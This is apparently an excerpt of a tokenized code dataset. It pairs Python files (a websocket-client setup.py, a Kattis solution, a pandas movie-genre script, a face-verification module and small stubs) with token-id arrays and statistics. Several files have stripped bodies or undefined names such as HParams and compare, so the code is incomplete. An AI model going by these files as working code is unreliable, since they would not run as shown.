220,
220,
37227,
628,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
198,
220,
220,
220,
1303,
25458,
284,
10104,
12665,
287,
12665,
62,
7568,
1366,
14535,
198,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
198,
220,
220,
220,
37227,
2312,
5050,
389,
973,
284,
10104,
12665,
286,
1393,
287,
262,
1388,
198,
220,
220,
220,
1366,
14535,
12665,
62,
7568,
13,
317,
7226,
30798,
318,
284,
38350,
6126,
1573,
198,
220,
220,
220,
19998,
1262,
32704,
5499,
11,
788,
10104,
257,
6291,
286,
12665,
198,
220,
220,
220,
326,
3994,
257,
1573,
286,
1393,
13,
1002,
777,
12665,
1656,
284,
307,
19125,
484,
198,
220,
220,
220,
460,
788,
307,
5710,
1262,
262,
12047,
5499,
2029,
13,
628,
220,
220,
220,
5740,
546,
19407,
12665,
287,
19798,
292,
287,
31744,
1296,
25,
761,
284,
900,
198,
220,
220,
220,
279,
67,
13,
2617,
62,
18076,
10786,
13812,
13,
9806,
62,
4033,
10394,
3256,
532,
16,
8,
290,
14,
273,
198,
220,
220,
220,
279,
67,
13,
2617,
62,
18076,
10786,
13812,
13,
10394,
3256,
7410,
8,
628,
220,
220,
220,
770,
1838,
340,
523,
2104,
6126,
318,
9066,
1231,
45616,
618,
691,
12665,
198,
220,
220,
220,
389,
5545,
287,
1366,
14535,
13,
628,
220,
220,
220,
1680,
3802,
279,
67,
13,
20147,
4892,
62,
18076,
10786,
13812,
11537,
284,
651,
9815,
1351,
286,
198,
220,
220,
220,
6460,
329,
20966,
7535,
11298,
13,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
825,
12665,
62,
38301,
7,
944,
11,
3381,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
16409,
477,
12665,
326,
3994,
3381,
422,
12665,
62,
7568,
13,
198,
220,
220,
220,
220,
220,
220,
220,
35118,
318,
257,
4731,
13,
628,
220,
220,
220,
220,
220,
220,
220,
383,
4504,
2134,
318,
257,
1366,
14535,
326,
4909,
262,
15274,
286,
12665,
62,
7568,
198,
220,
220,
220,
220,
220,
220,
220,
1366,
14535,
326,
423,
12665,
7268,
3381,
13,
628,
220,
220,
220,
220,
220,
220,
220,
3381,
357,
8841,
2599,
3381,
286,
1393,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
6818,
2099,
7,
4354,
8,
287,
357,
2536,
11,
28000,
1098,
8,
198,
220,
220,
220,
220,
220,
220,
220,
6818,
3381,
628,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
38301,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
5239,
13,
2536,
13,
3642,
1299,
7,
4354,
8,
6624,
6407,
60,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
18896,
7,
83,
732,
1039,
62,
38301,
828,
366,
83,
732,
1039,
3994,
428,
3381,
1,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
12665,
62,
38301,
58,
14692,
29460,
1600,
366,
5239,
8973,
60,
628,
220,
220,
220,
825,
12665,
62,
1525,
7,
944,
11,
20579,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
16409,
477,
12665,
416,
20579,
422,
12665,
62,
7568,
13,
628,
220,
220,
220,
220,
220,
220,
220,
11014,
284,
2029,
2163,
2845,
15455,
416,
20579,
2138,
621,
198,
220,
220,
220,
220,
220,
220,
220,
6126,
2420,
13,
628,
220,
220,
220,
220,
220,
220,
220,
20579,
357,
8841,
2599,
20579,
286,
1393,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
6818,
2099,
7,
29460,
8,
287,
357,
2536,
11,
28000,
1098,
8,
198,
220,
220,
220,
220,
220,
220,
220,
6818,
20579,
628,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
1525,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
29460,
6624,
20579,
60,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
12665,
62,
1525,
58,
14692,
29460,
1600,
366,
5239,
8973,
60,
198
] | 2.352486 | 21,564 |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""Reexport"""
from __future__ import print_function, division, unicode_literals
from .model import Model, Argument, BaseAdapter
from .exception import ArgumentError, ArgumentMissError, ArgumentInvalidError
__version__ = "0.0.2"
__all__ = ["ArgumentError", "ArgumentMissError", "ArgumentInvalidError",
"Model", "Argument", "BaseAdapter"]
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
40477,
12,
23,
532,
9,
12,
198,
37811,
3041,
39344,
37811,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
11,
7297,
11,
28000,
1098,
62,
17201,
874,
198,
198,
6738,
764,
19849,
1330,
9104,
11,
45751,
11,
7308,
47307,
198,
6738,
764,
1069,
4516,
1330,
45751,
12331,
11,
45751,
17140,
12331,
11,
45751,
44651,
12331,
628,
198,
834,
9641,
834,
796,
366,
15,
13,
15,
13,
17,
1,
628,
198,
834,
439,
834,
796,
14631,
28100,
1713,
12331,
1600,
366,
28100,
1713,
17140,
12331,
1600,
366,
28100,
1713,
44651,
12331,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17633,
1600,
366,
28100,
1713,
1600,
366,
14881,
47307,
8973,
198
] | 3.069231 | 130 |
# Author: btjanaka (Bryon Tjanaka)
# Problem: (Kattis) missingnumbers
# Title: Missing Numbers
# Link: https://open.kattis.com/problems/missingnumbers
# Idea: Keep counting.
# Difficulty: easy
# Tags: implementation
n = int(input())
cur = 1
num_printed = 0
for _ in range(n):
k = int(input())
while cur < k:
num_printed += 1
print(cur)
cur += 1
cur = k + 1
if num_printed == 0: print("good job")
| [
2,
6434,
25,
275,
83,
13881,
8130,
357,
33,
563,
261,
309,
13881,
8130,
8,
198,
2,
20647,
25,
357,
42,
1078,
271,
8,
4814,
77,
17024,
198,
2,
11851,
25,
25639,
27797,
198,
2,
7502,
25,
3740,
1378,
9654,
13,
74,
1078,
271,
13,
785,
14,
1676,
22143,
14,
45688,
77,
17024,
198,
2,
37560,
25,
9175,
14143,
13,
198,
2,
27419,
25,
2562,
198,
2,
44789,
25,
7822,
198,
198,
77,
796,
493,
7,
15414,
28955,
198,
22019,
796,
352,
198,
22510,
62,
49695,
796,
657,
198,
1640,
4808,
287,
2837,
7,
77,
2599,
198,
220,
220,
220,
479,
796,
493,
7,
15414,
28955,
198,
220,
220,
220,
981,
1090,
1279,
479,
25,
198,
220,
220,
220,
220,
220,
220,
220,
997,
62,
49695,
15853,
352,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
7,
22019,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1090,
15853,
352,
198,
220,
220,
220,
1090,
796,
479,
1343,
352,
198,
361,
997,
62,
49695,
6624,
657,
25,
3601,
7203,
11274,
1693,
4943,
198
] | 2.488506 | 174 |
#! /usr/bin/env python3
"""Unga programmerare kodkalender 2020, lucka 3."""
# https://ungaprogrammerare.se/kodkalender/lucka-3/
import functools
import math
import operator
a = math.factorial(100)
b = functools.reduce(operator.mul, range(2, 165, 2))
how_many = round(a / b)
print(f"Antal delar: {how_many}")
# Antal delar: 40599194442
| [
2,
0,
1220,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
37811,
52,
782,
64,
24292,
533,
479,
375,
74,
282,
2194,
12131,
11,
8458,
64,
513,
526,
15931,
198,
2,
3740,
1378,
2150,
499,
39529,
647,
533,
13,
325,
14,
74,
375,
74,
282,
2194,
14,
46708,
64,
12,
18,
14,
198,
198,
11748,
1257,
310,
10141,
198,
11748,
10688,
198,
11748,
10088,
198,
198,
64,
796,
10688,
13,
22584,
5132,
7,
3064,
8,
198,
65,
796,
1257,
310,
10141,
13,
445,
7234,
7,
46616,
13,
76,
377,
11,
2837,
7,
17,
11,
21409,
11,
362,
4008,
198,
4919,
62,
21834,
796,
2835,
7,
64,
1220,
275,
8,
198,
198,
4798,
7,
69,
1,
13217,
282,
1619,
283,
25,
1391,
4919,
62,
21834,
92,
4943,
198,
2,
3738,
282,
1619,
283,
25,
36966,
2079,
1129,
2598,
3682,
198
] | 2.421429 | 140 |
import datetime
import math
import os
import pickle
import random
import shutil
import time
import zipfile
import cv2 as cv
import numpy as np
import torch
from PIL import Image
from flask import request
from scipy.stats import norm
from torch import nn
from torch.utils.data import Dataset
from torchvision import transforms
from tqdm import tqdm
from werkzeug.utils import secure_filename
from align_faces import get_reference_facial_points, warp_and_crop_face
from config import STATIC_DIR, UPLOAD_DIR
from config import image_h, image_w, device, logger
from models import resnet101
from mtcnn.detector import detect_faces
from utils.common import ensure_folder, resize, AverageMeter
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
transformer = data_transforms['val']
times = AverageMeter()
config = HParams()
checkpoint = 'repo/face/insight-face-v3.pt'
logger.info('loading model: {}...'.format(checkpoint))
model = resnet101(config)
model.load_state_dict(torch.load(checkpoint))
model = nn.DataParallel(model)
model = model.to(device)
model.eval()
# model params
threshold = 76.75066649278368
mu_0 = 89.76046947988898
sigma_0 = 4.498024182861556
mu_1 = 42.66766813673472
sigma_1 = 8.62761102672923
class FaceNotFoundError(Exception):
"""Base class for other exceptions"""
pass
if __name__ == "__main__":
compare('id_card.jpg', 'photo_1.jpg')
compare('id_card.jpg', 'photo_2.jpg')
compare('id_card.jpg', 'photo_3.jpg')
compare('id_card.jpg', 'photo_4.jpg')
| [
11748,
4818,
8079,
198,
11748,
10688,
198,
11748,
28686,
198,
11748,
2298,
293,
198,
11748,
4738,
198,
11748,
4423,
346,
198,
11748,
640,
198,
11748,
19974,
7753,
198,
198,
11748,
269,
85,
17,
355,
269,
85,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28034,
198,
6738,
350,
4146,
1330,
7412,
198,
6738,
42903,
1330,
2581,
198,
6738,
629,
541,
88,
13,
34242,
1330,
2593,
198,
6738,
28034,
1330,
299,
77,
198,
6738,
28034,
13,
26791,
13,
7890,
1330,
16092,
292,
316,
198,
6738,
28034,
10178,
1330,
31408,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
6738,
266,
9587,
2736,
1018,
13,
26791,
1330,
5713,
62,
34345,
198,
198,
6738,
10548,
62,
32186,
1330,
651,
62,
35790,
62,
69,
18150,
62,
13033,
11,
25825,
62,
392,
62,
31476,
62,
2550,
198,
6738,
4566,
1330,
15486,
2149,
62,
34720,
11,
471,
6489,
41048,
62,
34720,
198,
6738,
4566,
1330,
2939,
62,
71,
11,
2939,
62,
86,
11,
3335,
11,
49706,
198,
6738,
4981,
1330,
581,
3262,
8784,
198,
6738,
285,
23047,
20471,
13,
15255,
9250,
1330,
4886,
62,
32186,
198,
6738,
3384,
4487,
13,
11321,
1330,
4155,
62,
43551,
11,
47558,
11,
13475,
44,
2357,
198,
198,
7890,
62,
7645,
23914,
796,
1391,
198,
220,
220,
220,
705,
27432,
10354,
31408,
13,
7293,
577,
26933,
198,
220,
220,
220,
220,
220,
220,
220,
31408,
13,
29531,
27991,
38342,
7414,
541,
22784,
198,
220,
220,
220,
220,
220,
220,
220,
31408,
13,
2514,
51,
22854,
22784,
198,
220,
220,
220,
220,
220,
220,
220,
31408,
13,
26447,
1096,
26933,
15,
13,
32642,
11,
657,
13,
29228,
11,
657,
13,
29703,
4357,
685,
15,
13,
23539,
11,
657,
13,
24137,
11,
657,
13,
18182,
12962,
198,
220,
220,
220,
2361,
828,
198,
220,
220,
220,
705,
2100,
10354,
31408,
13,
7293,
577,
26933,
198,
220,
220,
220,
220,
220,
220,
220,
31408,
13,
2514,
51,
22854,
22784,
198,
220,
220,
220,
220,
220,
220,
220,
31408,
13,
26447,
1096,
26933,
15,
13,
32642,
11,
657,
13,
29228,
11,
657,
13,
29703,
4357,
685,
15,
13,
23539,
11,
657,
13,
24137,
11,
657,
13,
18182,
12962,
198,
220,
220,
220,
2361,
828,
198,
92,
198,
7645,
16354,
796,
1366,
62,
7645,
23914,
17816,
2100,
20520,
198,
198,
22355,
796,
13475,
44,
2357,
3419,
628,
198,
198,
11250,
796,
6574,
283,
4105,
3419,
198,
198,
9122,
4122,
796,
705,
260,
7501,
14,
2550,
14,
1040,
432,
12,
2550,
12,
85,
18,
13,
457,
6,
198,
6404,
1362,
13,
10951,
10786,
25138,
2746,
25,
23884,
986,
4458,
18982,
7,
9122,
4122,
4008,
198,
19849,
796,
581,
3262,
8784,
7,
11250,
8,
198,
19849,
13,
2220,
62,
5219,
62,
11600,
7,
13165,
354,
13,
2220,
7,
9122,
4122,
4008,
198,
19849,
796,
299,
77,
13,
6601,
10044,
29363,
7,
19849,
8,
198,
19849,
796,
2746,
13,
1462,
7,
25202,
8,
198,
19849,
13,
18206,
3419,
198,
198,
2,
2746,
42287,
198,
400,
10126,
796,
8684,
13,
15426,
2791,
33300,
25870,
27412,
198,
30300,
62,
15,
796,
9919,
13,
22,
31916,
3388,
31714,
28011,
4089,
198,
82,
13495,
62,
15,
796,
604,
13,
2920,
1795,
1731,
1507,
27033,
1314,
3980,
198,
30300,
62,
16,
796,
5433,
13,
28933,
35809,
1485,
3134,
2682,
4761,
198,
82,
13495,
62,
16,
796,
807,
13,
49856,
5333,
940,
25674,
1959,
1954,
628,
198,
4871,
15399,
3673,
21077,
12331,
7,
16922,
2599,
198,
220,
220,
220,
37227,
14881,
1398,
329,
584,
13269,
37811,
198,
220,
220,
220,
1208,
628,
628,
628,
628,
628,
628,
628,
628,
628,
628,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
8996,
10786,
312,
62,
9517,
13,
9479,
3256,
705,
23074,
62,
16,
13,
9479,
11537,
198,
220,
220,
220,
8996,
10786,
312,
62,
9517,
13,
9479,
3256,
705,
23074,
62,
17,
13,
9479,
11537,
198,
220,
220,
220,
8996,
10786,
312,
62,
9517,
13,
9479,
3256,
705,
23074,
62,
18,
13,
9479,
11537,
198,
220,
220,
220,
8996,
10786,
312,
62,
9517,
13,
9479,
3256,
705,
23074,
62,
19,
13,
9479,
11537,
198
] | 2.708148 | 675 |
import numpy as np
import cv2
import reip
class OpticalFlow(reip.Block):
'''
https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_video/py_lucas_kanade/py_lucas_kanade.html#dense-optical-flow-in-opencv
'''
hsv = None
_prev = None
# pyr_scale=0.5, levels=3, winsize=15, iterations=3,
# poly_n=5, poly_sigma=1.2, flags=0 | [
11748,
299,
32152,
355,
45941,
198,
11748,
269,
85,
17,
198,
11748,
302,
541,
628,
198,
198,
4871,
49593,
37535,
7,
260,
541,
13,
12235,
2599,
198,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
3740,
1378,
9654,
33967,
12,
29412,
12,
83,
315,
305,
874,
13,
961,
83,
704,
420,
82,
13,
952,
14,
268,
14,
42861,
14,
9078,
62,
83,
44917,
82,
14,
9078,
62,
15588,
14,
9078,
62,
75,
1229,
292,
62,
27541,
671,
14,
9078,
62,
75,
1229,
292,
62,
27541,
671,
13,
6494,
2,
67,
1072,
12,
8738,
605,
12,
11125,
12,
259,
12,
9654,
33967,
198,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
289,
21370,
796,
6045,
198,
220,
220,
220,
4808,
47050,
796,
6045,
628,
220,
220,
220,
1303,
279,
2417,
62,
9888,
28,
15,
13,
20,
11,
2974,
28,
18,
11,
7864,
1096,
28,
1314,
11,
34820,
28,
18,
11,
198,
220,
220,
220,
1303,
7514,
62,
77,
28,
20,
11,
7514,
62,
82,
13495,
28,
16,
13,
17,
11,
9701,
28,
15
] | 2.12069 | 174 |
import re
import subprocess
import os
from tqdm import tqdm
| [
11748,
302,
198,
11748,
850,
14681,
198,
11748,
28686,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
628,
198
] | 3.1 | 20 |
# Find the genre in which there has been the greatest number of movie releases
import pandas as pd
import numpy as np
dataset=pd.read_csv('c:\\temp\\HollywoodMovies.csv')
selected_data=dataset.loc[:,['WorldGross','Genre']]
df=pd.DataFrame(selected_data)
df_notnull_genre=df[df.Genre.notnull()]
df_notnull_worldgross=df_notnull_genre[df_notnull_genre.WorldGross.notnull()]
df_final= df_notnull_worldgross
Series_genre = df_final['WorldGross'].groupby(df_final['Genre']).sum()
df_new=pd.DataFrame(Series_genre)
genre=df_new.sort_values(by='WorldGross', ascending=False).head(10) #finding top 10 genre movies released
print genre
| [
2,
9938,
262,
12121,
287,
543,
612,
468,
587,
262,
6000,
1271,
286,
3807,
10050,
198,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
299,
32152,
355,
45941,
198,
198,
19608,
292,
316,
28,
30094,
13,
961,
62,
40664,
10786,
66,
25,
6852,
29510,
6852,
39,
31777,
44,
20526,
13,
40664,
11537,
198,
34213,
62,
7890,
28,
19608,
292,
316,
13,
17946,
58,
25,
17414,
6,
10603,
38,
1214,
41707,
13746,
260,
6,
11907,
198,
7568,
28,
30094,
13,
6601,
19778,
7,
34213,
62,
7890,
8,
198,
7568,
62,
1662,
8423,
62,
35850,
28,
7568,
58,
7568,
13,
13746,
260,
13,
1662,
8423,
3419,
60,
198,
7568,
62,
1662,
8423,
62,
6894,
47181,
28,
7568,
62,
1662,
8423,
62,
35850,
58,
7568,
62,
1662,
8423,
62,
35850,
13,
10603,
38,
1214,
13,
1662,
8423,
3419,
60,
198,
7568,
62,
20311,
28,
47764,
62,
1662,
8423,
62,
6894,
47181,
198,
27996,
62,
35850,
796,
47764,
62,
20311,
17816,
10603,
38,
1214,
6,
4083,
8094,
1525,
7,
7568,
62,
20311,
17816,
13746,
260,
20520,
737,
16345,
3419,
198,
7568,
62,
3605,
28,
30094,
13,
6601,
19778,
7,
27996,
62,
35850,
8,
198,
35850,
28,
7568,
62,
3605,
13,
30619,
62,
27160,
7,
1525,
11639,
10603,
38,
1214,
3256,
41988,
28,
25101,
737,
2256,
7,
940,
8,
220,
1303,
41070,
1353,
838,
12121,
6918,
2716,
198,
4798,
12121,
198
] | 2.77533 | 227 |
import esphome.codegen as cg
from esphome.components import binary_sensor
from .. import (
HOME_ASSISTANT_IMPORT_SCHEMA,
homeassistant_ns,
setup_home_assistant_entity,
)
DEPENDENCIES = ["api"]
HomeassistantBinarySensor = homeassistant_ns.class_(
"HomeassistantBinarySensor", binary_sensor.BinarySensor, cg.Component
)
CONFIG_SCHEMA = binary_sensor.binary_sensor_schema(HomeassistantBinarySensor).extend(
HOME_ASSISTANT_IMPORT_SCHEMA
)
| [
11748,
1658,
746,
462,
13,
8189,
5235,
355,
269,
70,
198,
6738,
1658,
746,
462,
13,
5589,
3906,
1330,
13934,
62,
82,
22854,
198,
198,
6738,
11485,
1330,
357,
198,
220,
220,
220,
41779,
62,
10705,
8808,
8643,
62,
3955,
15490,
62,
50,
3398,
27630,
11,
198,
220,
220,
220,
1363,
562,
10167,
62,
5907,
11,
198,
220,
220,
220,
9058,
62,
11195,
62,
562,
10167,
62,
26858,
11,
198,
8,
198,
198,
46162,
10619,
24181,
11015,
796,
14631,
15042,
8973,
198,
198,
16060,
562,
10167,
33,
3219,
47864,
796,
1363,
562,
10167,
62,
5907,
13,
4871,
41052,
198,
220,
220,
220,
366,
16060,
562,
10167,
33,
3219,
47864,
1600,
13934,
62,
82,
22854,
13,
33,
3219,
47864,
11,
269,
70,
13,
21950,
198,
8,
198,
198,
10943,
16254,
62,
50,
3398,
27630,
796,
13934,
62,
82,
22854,
13,
39491,
62,
82,
22854,
62,
15952,
2611,
7,
16060,
562,
10167,
33,
3219,
47864,
737,
2302,
437,
7,
198,
220,
220,
220,
41779,
62,
10705,
8808,
8643,
62,
3955,
15490,
62,
50,
3398,
27630,
198,
8,
628
] | 2.613636 | 176 |
# -*-coding:utf-8-*-
"""
์ง๋ฒ ๋ณํ recursive ์๊ณ ๋ฆฌ์ฆ
2 <= n <= 16๊น์ง ๊ฐ๋ฅ
"""
"""
def test(n,t):
answer = ''
while t//n >= 1:
re = t%n
t = t//n
answer = str(re) + answer
print(answer)
if t < n:
answer = str(t) + answer
return int(answer)
"""
"""
# ์ง๋ฒ ๋ณํ ํจ์ ์ฌ๋์
def convert_2(t, n):
s = 'ABCDEF'
a = ''
while t:
if t%n > 9:
a = s[t%n -10] + a
else:
a = str(t%n) + a
t = t//n
return a
""" | [
2,
532,
9,
12,
66,
7656,
25,
40477,
12,
23,
12,
9,
12,
198,
198,
37811,
198,
168,
100,
226,
167,
110,
243,
31619,
111,
222,
169,
247,
246,
45115,
23821,
243,
234,
166,
111,
254,
167,
99,
105,
168,
99,
246,
198,
17,
19841,
299,
19841,
1467,
166,
117,
234,
168,
100,
222,
220,
166,
108,
222,
167,
232,
98,
220,
198,
37811,
198,
198,
37811,
198,
4299,
1332,
7,
77,
11,
83,
2599,
198,
220,
220,
220,
3280,
796,
10148,
198,
220,
220,
220,
981,
256,
1003,
77,
18189,
352,
25,
198,
220,
220,
220,
220,
220,
220,
220,
302,
796,
256,
4,
77,
198,
220,
220,
220,
220,
220,
220,
220,
256,
796,
256,
1003,
77,
198,
220,
220,
220,
220,
220,
220,
220,
3280,
796,
965,
7,
260,
8,
1343,
3280,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
7,
41484,
8,
198,
220,
220,
220,
220,
220,
220,
220,
611,
256,
1279,
299,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3280,
796,
965,
7,
83,
8,
1343,
3280,
198,
220,
220,
220,
1441,
493,
7,
41484,
8,
198,
37811,
198,
198,
37811,
198,
2,
23821,
100,
226,
167,
110,
243,
31619,
111,
222,
169,
247,
246,
220,
47991,
101,
168,
230,
246,
23821,
252,
105,
167,
237,
226,
168,
254,
226,
198,
4299,
10385,
62,
17,
7,
83,
11,
299,
2599,
198,
220,
220,
220,
264,
796,
705,
24694,
32988,
6,
198,
220,
220,
220,
257,
796,
10148,
198,
220,
220,
220,
981,
256,
25,
198,
220,
220,
220,
220,
220,
220,
220,
611,
256,
4,
77,
1875,
860,
25,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
796,
264,
58,
83,
4,
77,
532,
940,
60,
1343,
257,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
796,
965,
7,
83,
4,
77,
8,
1343,
257,
198,
220,
220,
220,
220,
220,
220,
220,
256,
796,
256,
1003,
77,
198,
220,
220,
220,
1441,
257,
198,
37811
] | 1.454286 | 350 |
from ..entity import Entity
from ..map import Map
from ..reference import Reference
from ..string import String
from ..void import Void
| [
6738,
11485,
26858,
1330,
20885,
198,
6738,
11485,
8899,
1330,
9347,
198,
6738,
11485,
35790,
1330,
20984,
198,
6738,
11485,
8841,
1330,
10903,
198,
6738,
11485,
19382,
1330,
18331,
628
] | 4.566667 | 30 |
import sys
import pkg_resources
from setuptools import setup, find_packages
"""
setup.py
websocket - WebSocket client library for Python
Copyright 2022 engn33r
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
VERSION = "1.3.1"
install_requires = []
tests_require = []
setup(
name="websocket-client",
version=VERSION,
description="WebSocket client for Python with low level API options",
long_description=open("README.md").read(),
long_description_content_type='text/markdown',
author="liris",
author_email="[email protected]",
license="Apache-2.0",
url="https://github.com/websocket-client/websocket-client.git",
download_url='https://github.com/websocket-client/websocket-client/releases',
python_requires='>=3.7',
extras_require={
"test": ["websockets"],
"optional": ["python-socks", "wsaccel"],
"docs": ["Sphinx >= 3.4", "sphinx_rtd_theme >= 0.5"],
},
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX",
"Operating System :: Microsoft :: Windows",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
"Intended Audience :: Developers",
],
project_urls={
'Documentation': 'https://websocket-client.readthedocs.io/',
'Source': 'https://github.com/websocket-client/websocket-client/',
},
keywords='websockets client',
entry_points={
'console_scripts': [
'wsdump=websocket._wsdump:main',
],
},
install_requires=install_requires,
packages=find_packages(),
package_data={
'websocket.tests': ['data/*.txt']
},
tests_require=tests_require,
test_suite="websocket.tests"
)
| [
11748,
25064,
198,
11748,
279,
10025,
62,
37540,
198,
6738,
900,
37623,
10141,
1330,
9058,
11,
1064,
62,
43789,
198,
198,
37811,
198,
40406,
13,
9078,
198,
732,
1443,
5459,
532,
5313,
39105,
5456,
5888,
329,
11361,
198,
198,
15269,
33160,
1786,
77,
2091,
81,
198,
198,
26656,
15385,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
5832,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
1639,
743,
7330,
257,
4866,
286,
262,
13789,
379,
628,
220,
220,
220,
2638,
1378,
2503,
13,
43073,
13,
2398,
14,
677,
4541,
14,
43,
2149,
24290,
12,
17,
13,
15,
198,
198,
28042,
2672,
416,
9723,
1099,
393,
4987,
284,
287,
3597,
11,
3788,
198,
17080,
6169,
739,
262,
13789,
318,
9387,
319,
281,
366,
1921,
3180,
1,
29809,
1797,
11,
198,
54,
10554,
12425,
34764,
11015,
6375,
7102,
49828,
11053,
3963,
15529,
509,
12115,
11,
2035,
4911,
393,
17142,
13,
198,
6214,
262,
13789,
329,
262,
2176,
3303,
15030,
21627,
290,
198,
2475,
20597,
739,
262,
13789,
13,
198,
37811,
198,
198,
43717,
796,
366,
16,
13,
18,
13,
16,
1,
198,
198,
17350,
62,
47911,
796,
17635,
198,
41989,
62,
46115,
796,
17635,
198,
198,
40406,
7,
198,
220,
220,
220,
1438,
2625,
732,
1443,
5459,
12,
16366,
1600,
198,
220,
220,
220,
2196,
28,
43717,
11,
198,
220,
220,
220,
6764,
2625,
13908,
39105,
5456,
329,
11361,
351,
1877,
1241,
7824,
3689,
1600,
198,
220,
220,
220,
890,
62,
11213,
28,
9654,
7203,
15675,
11682,
13,
9132,
11074,
961,
22784,
198,
220,
220,
220,
890,
62,
11213,
62,
11299,
62,
4906,
11639,
5239,
14,
4102,
2902,
3256,
198,
220,
220,
220,
1772,
2625,
75,
29616,
1600,
198,
220,
220,
220,
1772,
62,
12888,
2625,
75,
29616,
13,
381,
31,
14816,
13,
785,
1600,
198,
220,
220,
220,
5964,
2625,
25189,
4891,
12,
17,
13,
15,
1600,
198,
220,
220,
220,
19016,
2625,
5450,
1378,
12567,
13,
785,
14,
732,
1443,
5459,
12,
16366,
14,
732,
1443,
5459,
12,
16366,
13,
18300,
1600,
198,
220,
220,
220,
4321,
62,
6371,
11639,
5450,
1378,
12567,
13,
785,
14,
732,
1443,
5459,
12,
16366,
14,
732,
1443,
5459,
12,
16366,
14,
260,
29329,
3256,
198,
220,
220,
220,
21015,
62,
47911,
11639,
29,
28,
18,
13,
22,
3256,
198,
220,
220,
220,
33849,
62,
46115,
34758,
198,
220,
220,
220,
220,
220,
220,
220,
366,
9288,
1298,
14631,
732,
1443,
11603,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
366,
25968,
1298,
14631,
29412,
12,
82,
3320,
1600,
366,
18504,
330,
5276,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
366,
31628,
1298,
14631,
50,
746,
28413,
18189,
513,
13,
19,
1600,
366,
82,
746,
28413,
62,
81,
8671,
62,
43810,
18189,
657,
13,
20,
33116,
198,
220,
220,
220,
8964,
198,
220,
220,
220,
1398,
13350,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
366,
41206,
12678,
7904,
604,
532,
17993,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
34156,
7904,
7294,
40,
20010,
1079,
7904,
24843,
10442,
13789,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
513,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
513,
13,
22,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
513,
13,
23,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
513,
13,
24,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
513,
13,
940,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
18843,
803,
4482,
7904,
4100,
2640,
7904,
4100,
2640,
1395,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
18843,
803,
4482,
7904,
28069,
10426,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
18843,
803,
4482,
7904,
5413,
7904,
3964,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
33221,
7904,
4455,
1600,
198,
220,
220,
220,
220,
